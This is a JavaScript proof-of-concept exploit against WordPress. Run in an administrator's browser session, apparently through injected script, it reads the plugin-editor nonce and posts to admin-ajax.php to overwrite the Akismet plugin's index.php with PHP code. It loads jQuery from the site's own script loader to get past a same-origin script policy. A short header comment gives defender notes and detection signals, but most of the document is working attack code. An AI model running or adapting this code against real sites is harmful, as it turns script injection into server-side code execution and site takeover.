WordPress Akismet plugin index.php edit
/**
 * Proof-of-concept that rewrites a plugin file through the WordPress plugin
 * editor, using whatever session the current browser already holds.
 *
 * Flow, as written:
 *   1. GET the plugin-editor page for akismet/index.php and read the editor
 *      nonce from the `#template #nonce` field.
 *   2. POST to admin-ajax.php with action `edit-theme-plugin-file`, replacing
 *      the content of akismet/index.php with a PHP snippet that calls
 *      phpinfo().
 *   3. Open /wp-content/plugins/akismet/ in a new window.
 *
 * When no nonce is found in the response (presumably because the session has
 * no access to the plugin editor), nothing is posted.
 *
 * Defender notes: every request is same-origin, so the nonce check does not
 * help once script runs in an administrator's origin. Defining
 * DISALLOW_FILE_EDIT in wp-config.php removes the editor capability this flow
 * relies on. Useful signals are POSTs to /wp-admin/admin-ajax.php carrying
 * action=edit-theme-plugin-file and file-integrity changes under
 * wp-content/plugins/.
 */
var exploit = function () {
  // Content written into the target file; the trailing `/*` opens a PHP comment.
  const phpcode = '<?php phpinfo();/*';
  const editorPage = '/wp-admin/plugin-editor.php?plugin=akismet/index.php&Submit=Select';
  const ajaxEndpoint = '/wp-admin/admin-ajax.php';
  const file = 'akismet/index.php';
  const plugin = 'akismet/akismet.php';

  // Runs once the edit request has completed successfully.
  const onSaved = function () {
    console.log('Success!');
    window.open('/wp-content/plugins/akismet/');
  };

  // Runs with the HTML of the plugin-editor page.
  const onEditorPage = function (data) {
    const nonce = jQuery(data).find('#template #nonce').val();
    if (!nonce) {
      return;
    }
    console.log(`Success! nonce: ${nonce}`);

    // Same fields, in the same order, as the editor's own save request.
    const postdata = {
      nonce,
      newcontent: phpcode,
      action: 'edit-theme-plugin-file',
      file,
      plugin,
      'docs-list': '',
    };

    console.log('Add PHP code to plugin file.');
    jQuery.post(ajaxEndpoint, postdata, onSaved);
  };

  console.log('Get nonce token.');
  jQuery.get(editorPage, onEditorPage);
};
// Bootstrap: load jQuery from the site's own script loader and run `exploit`
// once it is available. The script URL is same-origin, so a script-src policy
// limited to 'self' does not block this step.
var headEl = document.getElementsByTagName('head').item(0);
var jqueryLoader = document.createElement('script');
// The handler is attached before `src` is set, so the load event cannot be missed.
jqueryLoader.onload = exploit;
jqueryLoader.src = '/wp-admin/load-scripts.php?load=jquery-core';
headEl.appendChild(jqueryLoader);